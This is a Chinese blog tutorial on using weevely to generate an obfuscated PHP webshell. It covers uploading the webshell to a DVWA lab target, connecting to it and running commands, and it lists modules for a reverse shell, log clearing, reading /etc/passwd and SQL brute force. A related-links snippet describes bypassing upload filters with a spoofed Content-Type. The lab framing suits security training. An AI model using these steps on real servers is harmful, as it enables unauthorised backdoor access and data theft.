【使用过程】weevely生成、上传、连接、执行…你一定行

这篇具有很好参考价值的文章主要介绍了【使用过程】weevely生成、上传、连接、执行…你一定行。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

weevely前言:

简介:

使用方法:

第一步:查看是否安装weevely,并查看版本信息

第二步:生成shell(php)文件

第二步:上传文件到目标服务器 

第三步:在终端使用weevely,连接到shell(php文件)

第四步:执行相关系统命令,获取相关信息

第五步:调用weevely模块

小白初试使用方法:

模块大全:

推荐:



【使用过程】weevely生成、上传、连接、执行…你一定行

 

weevely前言:

Webshell是经常被使用的攻击手法,一般会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或php后门,得到一个命令执行环境,以达到控制网站服务器的目的

简介:

(在Linux中已经集成安装了)

weevely是一款使用python编写针对PHP的webshell工具,采用c/s模式构建,能模拟一个类似于telnet的连接shell。

使用的是比较主流的base64加密结合字符串变形技术,后门中所使用的函数均是常用的字符串处理函数,有很好的隐蔽性。

weevely具有生成shell文件、连接后台、资源搜索、信息探测、文件管理操作、错误配置审计、暴力破解、数据库操作、端口扫描等功能

使用方法:

第一步:查看是否安装weevely,并查看版本信息

打开终端,输入weevely,检查是否安装了weevely,如果安装过,就能看见版本信息,并能看见基本的使用说明

【使用过程】weevely生成、上传、连接、执行…你一定行

第二步:生成shell(php)文件

 weevely generate <password>  <path>/xx.php

我这里输入的是weevely generate 111 /root/1.php 

(这个path是已经存在的路径,而后面的文件是将要在这个目录下生成的shell文件)

【使用过程】weevely生成、上传、连接、执行…你一定行

 【使用过程】weevely生成、上传、连接、执行…你一定行

第二步:上传文件到目标服务器 

我这里使用owaspbwa靶机来试

【使用过程】weevely生成、上传、连接、执行…你一定行

找到upload上传地方,然后上传生成的shell(php)文件

【使用过程】weevely生成、上传、连接、执行…你一定行

查看上传文件所在的地址(真实中,文件目录啥的都可以扫出来)

【使用过程】weevely生成、上传、连接、执行…你一定行

第三步:在终端使用weevely,连接到shell(php文件)

weevely  <url>  <password>

我这里输入的是weevely http://192.168.190.130/dvwa/hackable/uploads/1.php 111

这里的URL指文件上传后的文件所在地址

【使用过程】weevely生成、上传、连接、执行…你一定行

第四步:执行相关系统命令,获取相关信息

 第一次执行的提示Permission denied(权限不够)

然后下面就进入到上传到的那个文件夹里面了

【使用过程】weevely生成、上传、连接、执行…你一定行

 然后再加上ls

就成功了 

【使用过程】weevely生成、上传、连接、执行…你一定行

第五步:调用weevely模块

执行更多的操作,输入help命令可以查看相关的命令

【使用过程】weevely生成、上传、连接、执行…你一定行

 随机试一个幸运儿

【使用过程】weevely生成、上传、连接、执行…你一定行

【使用过程】weevely生成、上传、连接、执行…你一定行

 

小白初试使用方法:

不知道模块的命令的话,就可以把命令输入,然后查看给出的提示

【使用过程】weevely生成、上传、连接、执行…你一定行

模块大全:

:backdoor_reversetcp          执行反向TCP shell

:backdoor_tcp                 在TCP端口产生一个壳

:file_cp                      复制单个文件

 :file_grep                    打印线与多个文件中的模式匹配

 :file_zip                     压缩或展开ZIP文件

 :file_bzip2                   压缩或展开Bzip2文件

:file_tar                     压缩或展开tar文件

 :file_gzip                    压缩或展开Gzip文件

:file_mount                   使用httpfs安装远程文件系统

 :file_cd                      更改当前工作目录

 :file_clearlog                从文件中删除字符串

 :file_read                    从远程文件系统中读取远程文件

:file_download                从远程文件系统下载文件

 :file_touch                   更改文件时间戳

 :file_ls                      列表目录内容

 :file_enum                    检查存在列表列表的存在和权限

:file_upload                  将文件上传到远程文件系统

 :file_find                    查找具有给定名称和属性的文件

 :file_check                   获取文件的属性和权限

 :file_edit                    在本地编辑器上编辑远程文件

 :file_webdownload             下载URL.

 :file_upload2web              将文件自动上传到Web文件夹并获得相应的URL

:file_rm                      删除远程文件

 :shell_php                    执行php命令

 :shell_sh                     执行shell命令

:shell_su                     执行su的命令

:sql_dump                     多DBMS MySqldump更换

:sql_console                  执行SQL查询或运行控制台

 :bruteforce_sql               BruteForce SQL数据库

:net_ifconfig                 获取网络接口地址

:net_mail                     发送邮件

 :net_curl                     执行类似卷曲的HTTP请求。

 :net_scan                     TCP端口扫描。

 :net_proxy                    运行本地代理以通过目标浏览HTTP / HTTPS浏览。

 :net_phpproxy                 在目标上安装PHP代理。

:system_info                  收集系统信息。

 :system_extensions            收集PHP和WebServer扩展列表。

 :system_procs                 列出运行进程。

:audit_phpconf               审核PHP配置。

 :audit_suidsgid               查找suid或sgid标志的文件。

 :audit_disablefunctionbypass  旁路禁用与mod_cgi和.htaccess的限制。

 :audit_filesystem             审核文件系统以获取弱权限。        

 :audit_etcpasswd              用不同的技术读取/ etc / passwd。

推荐:

【XSS跨站合集】反射型、存储型、DOM类XSS原理+利用过程

Burpsuite【十二模块一次解决】【这都不看?】Filter、Target、Scanner、Proxy、Intruder、Repeater、Sequencer、Decoder、Comparer…

【数据隐藏】一起入门隐写吧,宝?word、图像、移动设备、文件压缩数据隐藏文章来源地址https://www.toymoban.com/news/detail-482180.html

到了这里,关于【使用过程】weevely生成、上传、连接、执行…你一定行的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 你写的防止任意文件上传漏洞的代码,不一定安全

    上传一个PHP文件,提示文件类型错误,使用ApiPost修改上传的Content-Type,把原先的application/x-httpd-php修改为image/png,则可绕过。 因为: $_FILES[\\\'type\\\']是根据上传文件的content-type获取的,并文件本身的mime-type,而content-type又可以被篡改。 说话得有依据,经过反复的追Laravel的源码:

    2024年02月04日
    浏览(38)
  • Matlab 生成一定信噪比的信号

    信噪比公式 1 : S N R = 10 ∗ l o g 10 P s P n 信噪比公式1:SNR=10*log_{10}frac{P_s}{P_n} 信噪比公式 1 : SNR = 10 ∗ l o g 10 ​ P n ​ P s ​ ​ 其中, P s P_s P s ​ 和 P n P_n P n ​ 分别指 信号的平均功率、噪声的平均功率。 当信号和噪声的长度相等为N时,根据平均功率的公式 P s = E s /

    2024年02月11日
    浏览(47)
  • 【webflux】使用flatMapSequential操作过滤过程,不启动新线程执行新Flux

    在Spring WebFlux中,可以使用Flux.fromIterable()方法将一个Iterable转换为Flux对象,然后使用filter()方法过滤出符合条件的多个bean,并且可以使用flatMapSequential()方法将每个符合条件的bean处理后再进行操作。 假设我们有一个List对象,其中每个Bean对象都有一个属性value,我们需要过滤出

    2024年02月08日
    浏览(63)
  • 在Pycharm中将自己的本地项目上传到github仓库——适合有一定经验的“新手”

    提示: 这是本人第一次写博客,用于记录我本人遇到的问题和解决方法,也可供大家参考。 内容粗糙,请见谅。 本文主要记录一下本人 如何在pycharm将自己本地电脑的项目同步到自己的github仓库 ,有需要的小伙伴可以参考一下。 用到的工具和环境:windows11、pycahrm2021.2、g

    2024年02月05日
    浏览(51)
  • 使用Python生成可执行的.exe文件

    生成可执行文件的优点: 不需要安装对应的编程环境; 可以将你的应用闭源; 用户方便、快捷地使用。 打包工具:pyinstaller Python是一个脚本语言,被解释器解释执行。它的发布方式包括: .py文件:对于开源项目或者源码没那么重要的,直接提供源码,需要使用者自行安装

    2024年02月16日
    浏览(36)
  • 【Git教程】(十七)发行版交付 — 概述及使用要求,执行过程及其实现,替代解决方案 ~

    对于每个项目或产品来说,发布版本的创建都需要一定的时间,其具体过程因各公司或组织的情况而异。 Git 无法用来指定项目进入发布阶段的时间。但我们可以利用标签和分支这两个强大的Git 工具来为发布进度设置一个很宽泛的时间区间。 在本章的工作流中,我们将以一个

    2024年04月28日
    浏览(45)
  • 使用 Python 连接 SSH 服务器并执行命令

    实际开发中,有时候经常需要查看日志,有时候使用ssh工具打开就为了看一下错误日志又比较麻烦,所以今天带来一个简单的基于python的小工具. 首先需要先安装一个库 paramiko 使用命令直接安装 paramiko库是一个开源的、基于SSH2协议的库,可以实现SSH连接以及数据的传输。 paramik

    2024年02月08日
    浏览(41)
  • java使用jsqlparser实现入参,并生成可执行sql

    话不多说,直接上 验证通过的代码 执行结果如下: 通过多个单条sql,生成关联sql,也就是 join on 执行结果:

    2024年02月14日
    浏览(36)
  • ai作画在线生成!这8个AI生图工具一定要知道。

    过去的2023年被称作AI元年,随之而来的2024,被业内人士称之为AI应用元年,即随着大模型和各类AI应用的涌现速度放缓,人们关注的焦点也从产品层面(有哪些好用的AI应用),转移到AI如何更好地赋能实际业务的应用场景。 就大多数人的日常工作而言,最常见的业务场景为:

    2024年03月23日
    浏览(127)
  • 实战 php 使用 wkhtmltopdf 生成pdf的全过程

    公司里边有生成pdf报告的业务需求,之前有过尝试用tcpdf,直接生成的pdf的过程,但是pdf报告的内容数据,根据不同内容的变化,都是各种各样的bug,一直处理修修补补的状态,让后台开发人员很是头疼. 经过思索和甄选,总结出我们的业务中是由于样式不可控导致的,当时从逻辑上就思考

    2024年02月02日
    浏览(60)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包